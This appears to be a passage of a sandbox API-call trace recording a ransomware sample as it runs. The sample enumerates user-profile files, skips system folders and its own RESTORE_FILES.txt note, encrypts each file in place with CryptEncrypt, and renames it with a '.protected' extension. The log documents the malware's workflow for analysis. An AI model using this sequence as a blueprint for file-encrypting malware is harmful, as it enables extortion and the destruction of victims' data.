[0095.374] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG") returned 35 [0095.374] StrStrW (lpFirst="NTUSER.DAT.LOG", lpSrch=".zip") returned 0x0 [0095.374] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x400, lpOverlapped=0x0) returned 1 [0095.379] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xfffffc00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.379] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x400, lpOverlapped=0x0) returned 1 [0095.379] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.379] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.379] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.379] CloseHandle (hObject=0xa4) returned 1 [0095.380] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.protected") returned 45 [0095.380] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG" (normalized: "c:\\users\\default\\ntuser.dat.log"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG.protected" (normalized: "c:\\users\\default\\ntuser.dat.log.protected")) returned 1 [0095.381] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Windows") returned -1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Program Files") returned -1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="Program Files (x86)") returned -1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="$Recycle.bin") returned 1 [0095.381] lstrcmpiW (lpString1="NTUSER.DAT.LOG1", lpString2="System Volume Information") returned -1 [0095.381] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0095.381] StrStrIW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".protected") returned 0x0 [0095.381] lstrcmpW (lpString1="NTUSER.DAT.LOG1", lpString2="RESTORE_FILES.txt") returned -1 [0095.381] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.381] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.381] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0095.381] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".txt") returned 0x0 [0095.381] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0095.381] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".rar") returned 0x0 [0095.381] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1") returned 36 [0095.381] StrStrW (lpFirst="NTUSER.DAT.LOG1", lpSrch=".zip") returned 0x0 [0095.382] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.390] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.390] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.391] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.391] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.392] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.392] CloseHandle (hObject=0xa4) returned 1 [0095.392] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.protected") returned 46 [0095.392] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1" (normalized: "c:\\users\\default\\ntuser.dat.log1"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG1.protected" (normalized: "c:\\users\\default\\ntuser.dat.log1.protected")) returned 1 [0095.393] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Windows") returned -1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Program Files") returned -1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="Program Files (x86)") returned -1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="$Recycle.bin") returned 1 [0095.393] lstrcmpiW (lpString1="NTUSER.DAT.LOG2", lpString2="System Volume Information") returned -1 [0095.393] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0095.393] StrStrIW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".protected") returned 0x0 [0095.393] lstrcmpW (lpString1="NTUSER.DAT.LOG2", lpString2="RESTORE_FILES.txt") returned -1 [0095.393] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.393] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.393] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.394] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0095.394] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".txt") returned 0x0 [0095.394] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0095.394] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".rar") returned 0x0 [0095.394] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2") returned 36 [0095.394] StrStrW (lpFirst="NTUSER.DAT.LOG2", lpSrch=".zip") returned 0x0 [0095.394] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x0, lpOverlapped=0x0) returned 1 [0095.394] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.394] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x0, lpOverlapped=0x0) returned 1 [0095.394] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.395] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.395] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.395] CloseHandle (hObject=0xa4) returned 1 [0095.396] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.protected") returned 46 [0095.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2" (normalized: "c:\\users\\default\\ntuser.dat.log2"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT.LOG2.protected" (normalized: "c:\\users\\default\\ntuser.dat.log2.protected")) returned 1 [0095.397] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Windows") returned -1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Program Files") returned -1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="Program Files (x86)") returned -1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="$Recycle.bin") returned 1 [0095.397] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="System Volume Information") returned -1 [0095.397] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0095.397] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".protected") returned 0x0 [0095.397] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="RESTORE_FILES.txt") returned -1 [0095.397] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.397] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.398] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0095.398] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".txt") returned 0x0 [0095.398] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0095.398] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".rar") returned 0x0 [0095.398] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 76 [0095.398] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".zip") returned 0x0 [0095.398] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.406] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.406] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.407] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.407] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.407] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.407] CloseHandle (hObject=0xa4) returned 1 [0095.408] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.protected") returned 86 [0095.408] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf.protected" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tm.blf.protected")) returned 1 [0095.409] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Windows") returned -1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Program Files") returned -1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="Program Files (x86)") returned -1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="$Recycle.bin") returned 1 [0095.409] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="System Volume Information") returned -1 [0095.409] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0095.409] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".protected") returned 0x0 [0095.409] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.409] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.409] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.409] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.409] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0095.410] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".txt") returned 0x0 [0095.410] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0095.410] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".rar") returned 0x0 [0095.410] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 113 [0095.410] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".zip") returned 0x0 [0095.410] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.411] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.411] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.412] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.412] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.413] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.413] CloseHandle (hObject=0xa4) returned 1 [0095.413] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.protected") returned 123 [0095.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.protected" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.protected")) returned 1 [0095.414] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Windows") returned -1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Program Files") returned -1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="Program Files (x86)") returned -1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="$Recycle.bin") returned 1 [0095.414] lstrcmpiW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="System Volume Information") returned -1 [0095.414] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0095.414] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".protected") returned 0x0 [0095.414] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.414] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f39c | out: pbBuffer=0x295f39c) returned 1 [0095.414] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f3c4*=0x30) returned 1 [0095.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\default\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.415] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0095.415] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".txt") returned 0x0 [0095.415] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0095.415] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".rar") returned 0x0 [0095.415] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms") returned 113 [0095.415] StrStrW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".zip") returned 0x0 [0095.415] ReadFile (in: hFile=0xa4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.422] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.422] WriteFile (in: hFile=0xa4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f3e4*=0x2800, lpOverlapped=0x0) returned 1 [0095.422] SetFilePointerEx (in: hFile=0xa4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.423] WriteFile (in: hFile=0xa4, lpBuffer=0x295f3bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x295f3bc*, lpNumberOfBytesWritten=0x295f3e4*=0x4, lpOverlapped=0x0) returned 1 [0095.423] WriteFile (in: hFile=0xa4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f3e4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f3e4*=0x30, lpOverlapped=0x0) returned 1 [0095.423] CloseHandle (hObject=0xa4) returned 1 [0095.424] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms.protected") returned 123 [0095.424] MoveFileW 